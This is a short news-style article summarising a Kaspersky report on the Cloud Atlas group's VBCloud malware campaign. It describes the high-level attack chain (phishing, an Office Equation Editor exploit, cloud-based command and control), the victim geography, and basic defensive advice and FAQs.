Penelope Iroko Table of Contents
VBCloud Malware is a rising threat: ThreatCloud Atlas, a long-active cybercrime group, has been linked to a new wave of cyberattacks leveraging a sophisticated malware known as VBCloud.
These attacks, which have targeted organizations primarily in Russia and other countries, highlight the group’s evolving tactics in 2024. According to Kaspersky’s analysis, VBCloud malware plays a critical role in data theft and system infiltration, utilizing phishing emails to exploit vulnerabilities in the Microsoft Office Equation Editor.
This new development raises concerns for cybersecurity professionals and emphasizes the importance of vigilance against cyber threats.
Key Takeaway to Cloud Atlas and VBCloud Malware:
- Cloud Atlas is employing VBCloud malware to target organizations, primarily in Russia, posing significant cybersecurity risks worldwide.
Unpacking the Threat: How Cloud Atlas Uses VBCloud Malware
Who Is Cloud Atlas?
Cloud Atlas, also known as Clean Ursa, Inception, Oxygen, and Red October, has been active since 2014. The group is known for sophisticated cyberattacks using spear-phishing campaigns to deliver malware payloads.
Previous operations linked to the group include the December 2022 attacks in Russia, Belarus, and Transnistria, deploying the PowerShower backdoor.
The VBCloud Malware
The latest campaign leverages VBCloud, an advanced malware variant used alongside VBShower and PowerShower. This malware enables the attackers to:
- Steal sensitive data: Including documents, system metadata, and Telegram-related files.
- Use cloud storage for communication: Enhancing stealth and resilience against detection.
- Execute staged attacks: Using phishing emails and RTF templates to exploit vulnerabilities like CVE-2018-0802.
Attack Chain Breakdown
Here’s how the attack unfolds:
| Stage | Details |
|---|---|
| Phishing Email | A malicious document is sent to targets. |
| RTF Template Injection | Exploits Equation Editor flaws to download an HTML Application (HTA) file. |
| VBShower Deployment | Uses NTFS ADS to create malicious files and cover tracks. |
| VBCloud Activation | Scheduled tasks trigger VBCloud for data collection and communication. |
Impact and Reach
Kaspersky’s report reveals that over 80% of the victims are based in Russia, with others identified in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam.
VBCloud’s use of public cloud storage for command-and-control (C2) communications makes it uniquely capable of bypassing conventional security measures.
Real-Life Example
This isn’t the first time Cloud Atlas has used sophisticated techniques to target victims.
In 2022, the group deployed PowerShower malware in spear-phishing attacks, exploiting Microsoft Office vulnerabilities to infiltrate systems.
Forecast: The Evolving Threat Landscape
As cybercriminals like Cloud Atlas refine their tools and tactics, we’re likely to see increased use of cloud-based communication for malware.
Organizations must prioritize patching vulnerabilities, implementing robust email filters, and training staff to recognize phishing attempts.
About Kaspersky
Kaspersky is a global cybersecurity company renowned for its advanced threat intelligence and solutions. They offer comprehensive protection for enterprises, governments, and individuals worldwide.
Rounding Up
The rise of VBCloud malware demonstrates Cloud Atlas’s ability to innovate and adapt, underscoring the need for continuous cybersecurity vigilance. By staying informed about threats like VBCloud, organizations can better protect their systems and data.
By taking proactive steps and staying alert to evolving threats like VBCloud malware, individuals and organizations can significantly reduce their risk of falling victim to these attacks.
FAQs
What is VBCloud malware?
- VBCloud is a type of malware used by Cloud Atlas for data theft and system infiltration.
How does VBCloud infect systems?
- It uses phishing emails with malicious documents exploiting vulnerabilities in Microsoft Office.
Who are the primary targets of Cloud Atlas?
- Over 80% of the victims are in Russia, with others in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam.
What measures can protect against VBCloud?
- Regularly update software, use advanced email filters, and educate users about phishing tactics.
Why is VBCloud difficult to detect?
- It uses public cloud storage for C2 communications, making it harder to trace.
